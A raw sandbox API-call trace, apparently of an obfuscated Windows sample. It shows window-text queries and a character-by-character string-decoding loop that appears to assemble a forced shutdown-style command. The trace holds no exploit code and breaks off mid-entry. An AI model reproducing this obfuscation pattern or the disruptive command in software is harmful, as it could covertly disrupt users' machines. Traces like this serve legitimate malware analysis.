lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0088.832] SysStringLen (param_1=" ") returned 0xff [0088.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0xe577bc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0088.833] GetWindowTextA (in: hWnd=0x102c2, lpString=0xe577bc, nMaxCount=255 | out: lpString="Activity Arrive Event") returned 21 [0088.833] GetLastError () returned 0x0 [0088.833] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0088.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0088.833] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0088.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=256, lpWideCharStr=0xe3bb3c, cchWideChar=511 | out: lpWideCharStr="Activity Arrive Event") returned 256 [0088.833] SysStringLen (param_1="Activ") returned 0x5 [0088.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Activ", cchWideChar=6, lpMultiByteStr=0xe5705c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Activ", lpUsedDefaultChar=0x0) returned 6 [0088.834] SetWindowTextA (hWnd=0x2036e, lpString="Activ") returned 1 [0088.834] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0088.834] GetFocus () returned 0x0 [0088.834] lstrlenA (lpString="Activ") returned 5 [0088.834] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xc, wParam=0x0, lParam=0xe5705c) returned 0x1 [0088.834] IsWindow (hWnd=0x2036e) returned 1 [0088.834] IsWindow (hWnd=0x2036e) returned 1 [0088.835] IsWindow (hWnd=0x2036e) returned 1 [0088.835] IsWindow (hWnd=0x2036e) returned 1 [0088.835] GetFocus () returned 0x0 [0088.835] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0088.836] GetFocus () returned 0x0 [0088.836] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x6) returned 0x310bcd0 [0088.836] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xd, wParam=0x6, lParam=0x310bcd0) returned 0x5 [0088.836] GetFocus () returned 0x0 [0088.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activ", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0088.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activ", cbMultiByte=-1, lpWideCharStr=0xe5705c, cchWideChar=6 | out: lpWideCharStr="Activ") returned 6 [0088.836] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bcd0 | out: hHeap=0x30f0000) returned 1 [0088.836] VarCmp (pvarLeft=0x28f180, pvarRight=0x28f1e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0088.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_", lpUsedDefaultChar=0x0) returned 1 [0088.837] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0088.838] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r", lpUsedDefaultChar=0x0) returned 1 [0088.838] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0088.838] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="t", lpUsedDefaultChar=0x0) returned 1 [0088.839] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0088.839] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0088.840] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0088.840] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u", lpUsedDefaultChar=0x0) returned 1 [0088.841] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0088.841] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82", lpUsedDefaultChar=0x0) returned 1 [0088.842] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0088.842] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0088.844] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0088.845] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0088.845] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0088.845] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0088.846] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.846] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0088.846] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0088.847] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0088.847] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0088.848] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0088.848] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.849] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.849] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0088.849] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0088.850] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y", lpUsedDefaultChar=0x0) returned 1 [0088.850] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0088.851] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.851] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.851] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.851] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0088.852] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0088.852] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s", lpUsedDefaultChar=0x0) returned 1 [0088.853] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.853] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0088.853] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.854] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.854] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.854] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0088.855] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.855] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0088.855] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0088.855] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0088.856] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0088.856] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.856] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0088.857] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0088.857] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0088.857] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0088.858] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0088.859] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.859] GetForegroundWindow () returned 0x102c2 [0088.859] GetLastError () returned 0x0 [0088.859] SysStringLen (param_1=" ") returned 0xff [0088.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0088.859] SysStringLen (param_1=" ") returned 0xff [0088.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0xe577bc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0088.860] GetWindowTextA (in: hWnd=0x102c2, lpString=0xe577bc, nMaxCount=255 | out: lpString="Activity Arrive Event") returned 21 [0088.860] GetLastError () returned 0x0 [0088.860] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0088.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0088.860] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0088.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=256, lpWideCharStr=0xe3bb3c, cchWideChar=511 | out: lpWideCharStr="Activity Arrive Event") returned 256 [0088.860] SysStringLen (param_1="Act") returned 0x3 [0088.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Act", cchWideChar=4, lpMultiByteStr=0xe4a94c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Act", lpUsedDefaultChar=0x0) returned 4 [0088.861] SetWindowTextA (hWnd=0x2036e, lpString="Act") returned 1 [0088.861] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0088.861] GetFocus () returned 0x0 [0088.861] lstrlenA (lpString="Act") returned 3 [0088.861] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xc, wParam=0x0, lParam=0xe4a94c) returned 0x1 [0088.862] IsWindow (hWnd=0x2036e) returned 1 [0088.862] IsWindow (hWnd=0x2036e) returned 1 [0088.862] IsWindow (hWnd=0x2036e) returned 1 [0088.862] IsWindow (hWnd=0x2036e) returned 1 [0088.862] GetFocus () returned 0x0 [0088.863] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0088.863] GetFocus () returned 0x0 [0088.863] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x4) returned 0x310bcd0 [0088.863] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xd, wParam=0x4, lParam=0x310bcd0) returned 0x3 [0088.863] GetFocus () returned 0x0 [0088.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Act", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0088.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Act", cbMultiByte=-1, lpWideCharStr=0xe4a94c, cchWideChar=4 | out: lpWideCharStr="Act") returned 4 [0088.863] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bcd0 | out: hHeap=0x30f0000) returned 1 [0088.863] VarCmp (pvarLeft=0x28f180, pvarRight=0x28f1e8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0088.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d", lpUsedDefaultChar=0x0) returned 1 [0088.865] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0088.865] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V", lpUsedDefaultChar=0x0) returned 1 [0088.866] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="I", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="I") returned 1 [0088.866] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.866] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[", lpUsedDefaultChar=0x0) returned 1 [0088.866] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0088.867] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Q", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Q", lpUsedDefaultChar=0x0) returned 1 [0088.867] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="D", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="D") returned 1 [0088.867] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0088.868] WideCharToMultiByte 